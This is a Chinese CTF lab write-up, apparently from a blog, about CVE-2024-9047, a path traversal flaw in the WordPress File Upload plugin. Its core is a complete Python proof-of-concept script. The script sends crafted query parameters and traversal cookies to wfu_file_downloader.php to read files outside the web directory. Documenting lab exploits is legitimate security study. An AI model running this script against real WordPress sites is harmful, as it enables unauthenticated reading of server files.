【春秋云镜】CVE-2024-9047 Wordpress File Upload 插件 文件遍历漏洞

该文章已生成可运行项目,

一、靶场介绍

WordPress 的 File Upload 插件在所有版本(包括 4.24.11)中都存在路径遍历漏洞,漏洞位于 wfu_file_downloader.php 文件中。这使得未经身份验证的攻击者可以读取或删除超出原定目录之外的文件。

在这里插入图片描述

漏洞分析

调用函数 wfu_fopen_for_downloader
在这里插入图片描述
这里调用了wfu_fopen_for_downloader
在这里插入图片描述

这两个地方也调用了
在这里插入图片描述

寻找参数的传入位置

在这里插入图片描述

二、POC

import requests
import time
import argparse

def exploit(target_url):
    timestamp = str(int(time.time()))
    path = "/wp-content/plugins/wp-file-upload/wfu_file_downloader.php"
    query_params = {
        'file': 'yosheep',
        'handler': 'dboption',
        'session_legacy': '1',
        'dboption_base': 'cookies',
        'dboption_useold': '1',
        'wfu_cookie': '1',
        'ticket': 'yosheep'
    }
    
    cookies = {
        f'wfu_storage_yosheep': '/../../../../../../flag',
        f'wfu_download_ticket_yosheep': timestamp,
        'wfu_ABSPATH': '/var/www/html/'
    }
    
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36",
    }

    try:
        response = requests.get(
            f"{target_url.rstrip('/')}{path}",
            params=query_params,
            cookies=cookies,
            headers=headers,
            timeout=10
        )
        response.raise_for_status()
        return response.text
    except requests.exceptions.RequestException as e:
        return f"请求失败: {str(e)}"
def main():
    parser = argparse.ArgumentParser(description='CVE-2024-9047漏洞利用工具')
    parser.add_argument('url', help='目标URL(包含协议,如http://example.com)')
    args = parser.parse_args()
    
    result = exploit(args.url)
    print(f"结果返回:\n{result}")

if __name__ == '__main__':
    main()

获取flag
在这里插入图片描述

最后也没看明白为什么传入地方时cookie,可能是在函数处理时对cookie的值进行引入了。
感兴趣的可以看这个位博主的文章:

(CVE-2024-9047)wordpress插件wp-file-upload任意文件读取分析及复现(含payload)

本文章已经生成可运行项目
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值